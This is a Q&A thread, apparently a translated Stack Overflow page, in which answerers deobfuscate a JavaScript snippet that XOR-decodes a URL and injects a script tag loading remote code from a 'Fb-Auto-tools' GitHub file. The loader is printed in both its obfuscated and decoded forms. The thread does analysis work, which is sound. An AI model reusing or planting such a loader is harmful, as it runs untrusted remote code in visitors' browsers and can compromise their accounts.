-3 
var _0xc86d=["\x6A\x76\x76\x72\x71\x38\x2D\x2D\x70\x63\x75\x2C\x65\x6B\x76\x6A\x77
              \x60\x2C\x61\x6D\x6F\x2D\x60\x6A\x63\x70\x65\x63\x74\x33\x3B\x3B\x34
              \x2D\x44\x60\x2F\x43\x77\x76\x6D\x2F\x76\x6D\x6D\x6E\x71\x2D\x6F\x63
              \x71\x76\x67\x70\x2D\x4B\x4C\x40\x4D\x5A\x2C\x68\x71","","\x6C\x65
              \x6E\x67\x74\x68","\x63\x68\x61\x72\x43\x6F\x64\x65\x41\x74","\x66
              \x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x73\x72\x63","\x73
              \x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65
              \x6E\x74","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F
              \x64\x79"];
var X=_0xc86d[0];
Y=_0xc86d[1];
Z=_0xc86d[1];
var V;
V=X[_0xc86d[2]];
for(i=0;i<V;i++){
    Y+=String[_0xc86d[4]](X[_0xc86d[3]](i)^2);
} ;
Z=unescape(Y);
document[_0xc86d[9]][_0xc86d[8]](document[_0xc86d[7]](_0xc86d[6]))[_0xc86d[5]]=Z;

已被解码为

var _0xc86d = ["jvvrq8--pcu,ekvjw`,amo-`jcpect3;;4-D`/Cwvm/vmmnq-ocqvgp-KL@MZ,hq", "", "length", "charCodeAt", "fromCharCode", "src", "script", "createElement", "appendChild", "body"];
var X = _0xc86d[0];
Y = _0xc86d[1];
Z = _0xc86d[1];
var V;
V = X[_0xc86d[2]];
for (i = 0; i < V; i++) {
    Y += String[_0xc86d[4]](X[_0xc86d[3]](i) ^ 2);
};
Z = unescape(Y);
document[_0xc86d[9]][_0xc86d[8]](document[_0xc86d[7]](_0xc86d[6]))[_0xc86d[5]] = Z;

但我还是不明白,它调用了我认为的外部链接...谢谢

编辑:

我只能走到这一步:(

var _0xc86d = ["jvvrq8--pcu,ekvjw`,amo-`jcpect3;;4-D`/Cwvm/vmmnq-ocqvgp-KL@MZ,hq", "", "length", "charCodeAt", "fromCharCode", "src", "script", "createElement", "appendChild", "body"];
var X = jvvrq8--pcu,ekvjw`,amo-`jcpect3;;4-D`/Cwvm/vmmnq-ocqvgp-KL@MZ,hq;
Y =  ;
Z =  ;
var V;
V = X[length];
for (i = 0; i < V; i++) {
Y += String[fromCharCode](X[charCodeat](i) ^ 2);
};
Z = unescape(Y);
document[body][appendChild](document[createElement](script))[src] = Z;

Z是什么?我无法解码,我是新手 :(

4

3 回答 3

0

您无法解码的特定代码行:

for (i = 0; i < V; i++) {
    Y += String[_0xc86d[4]](X[_0xc86d[3]](i) ^ 2);
}

等于:

for (i = 0; i < V; i++) {
    Y += String.fromCharCode(X.charCodeAt(i) ^ 2);
}

整个代码如下所示:

var X = "jvvrq8--pcu,ekvjw`,amo-`jcpect3;;4-D`/Cwvm/vmmnq-ocqvgp-KL@MZ,hq";
var Y = "";
var Z = "";

var V;

V = X.length;

for (i = 0; i < V; i++) {
    Y += String.fromCharCode(X.charCodeAt(i) ^ 2);
}

Z = unescape(Y);
document.body.appendChild(document.createElement("script")).src = Z;

并且可以压缩到这个:

var Y = "https://raw.github.com/bhargav1996/Fb-Auto-tools/master/INBOX.js";
Z = unescape(Y);
document.body.appendChild(document.createElement("script")).src = Z;

因此,整个代码script在您的 HTML 文档中插入一个指向https://raw.github.com/bhargav1996/Fb-Auto-tools/master/INBOX.js.

于 2013-10-12T21:23:39.710 回答
0

好的,所以基本上这里的整个代码更具可读性:

var X = "jvvrq8--pcu,ekvjw`,amo-`jcpect3;;4-D`/Cwvm/vmmnq-ocqvgp-KL@MZ,hq", Y = "", Z; 

for (var i = 0; i < X.length; i++) {
    Y += String.fromCharCode(X.charCodeAt(i) ^ 2);
}

Z = unescape(Y);
document.body.appendChild(document.createElement("script")).src = Z;

基本上它似乎是在创建一个脚本标签,导入为“ https://raw.github.com/bhargav1996/Fb-Auto-tools/master/INBOX.js

Soo 最简单的脚本形式是: 

document.body.appendChild(document.createElement("script")).src = "https://raw.github.com/bhargav1996/Fb-Auto-tools/master/INBOX.js";

于 2013-10-12T21:24:47.717 回答
0

相当于这个脚本

var X="jvvrq8--pcu,ekvjw`,amo-`jcpect3;;4-D`/Cwvm/vmmnq-ocqvgp-KL@MZ,hq", 
Y="", Z="",V;
V=X.length;
for(i=0;i<V;i++){
    Y+=String.fromCharCode(X.charCodeAt(i)^2);
} ;
Z=unescape(Y);
document.body.appendChild(document.createElement("script")).src=Z;

该脚本似乎在调用自身并在正文的末尾注入脚本,最后它解析为

document.body.appendChild(
    document.createElement("script")
).src="https://raw.github.com/bhargav1996/Fb-Auto-tools/master/INBOX.js";
于 2013-10-12T21:30:01.517 回答